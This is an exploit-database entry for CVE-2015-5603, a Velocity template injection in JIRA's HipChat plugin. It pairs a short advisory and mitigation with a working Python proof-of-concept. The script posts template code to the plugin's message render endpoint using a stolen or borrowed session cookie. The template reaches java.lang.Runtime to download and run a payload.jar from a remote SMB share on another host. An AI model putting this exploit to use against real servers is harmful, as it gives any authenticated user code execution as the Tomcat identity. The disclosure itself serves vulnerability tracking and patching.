JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability

vendor:

JIRA and the HipChat for JIRA plugin

by:

Chris Wood

8,8

CVSS

HIGH

Velocity Template Injection

CWE

Product Name: JIRA and the HipChat for JIRA plugin

Affected Version From: 1.3.2

Affected Version To: 6.30.0

Patch Exists: YES

Related CWE: CVE-2015-5603

CPE: a:atlassian:jira

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x64

2015

JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability

This vulnerability allows any authenticated JIRA user to execute code running as Tomcat identity. This is achieved by sending a specially crafted request to the JIRA server, which contains malicious Velocity Template code. This code is then executed by the server, allowing the attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of JIRA and the HipChat for JIRA plugin.

Source

Exploit-DB raw data:

############################################################################
# JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability
# Date: 2015-08-26
# CVE ID: CVE-2015-5603
# Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
#
# Product: JIRA and the HipChat for JIRA plugin.
# Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
# Affected JIRA product versions: 6.3.5 <= version <  6.4.11
#
# Discovered internally by Atlassian (vendor)
# Proof of concept script by Chris Wood <chris@invivid.com>
#
# Tested against JIRA 6.3.4a with HipChat 6.29.2 on Windows 7 x64
# Allows any authenticated JIRA user to execute code running as Tomcat identity
############################################################################

import urllib2
import json

# cookie of any authenticated session (ex. jira-user)
JSESSIONID = '541631B0D72EF1C71E932953F4760A70'

# jira server
RHOST      = 'http://192.168.2.15:8080'

# samba public share, read/write to anonymous users
CMD 	   = ' java -jar \\\\192.168.2.234\\public\\payload.jar '
data = {
    'message': ' $i18n.getClass().forName(\'java.lang.Runtime\').getMethod(\'getRuntime\', null).invoke(null, null).exec(\'' + CMD + '\').waitFor() '
}

opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'JSESSIONID=' + JSESSIONID))
urllib2.install_opener(opener)
req = urllib2.Request(RHOST + '/rest/hipchat/integrations/1.0/message/render/')
req.add_header('Content-Type', 'application/json')

response = urllib2.urlopen(req, json.dumps(data))

print('##################################')
print('######### CVE-2015-5603 ##########')
print('##################################')
print(response.read())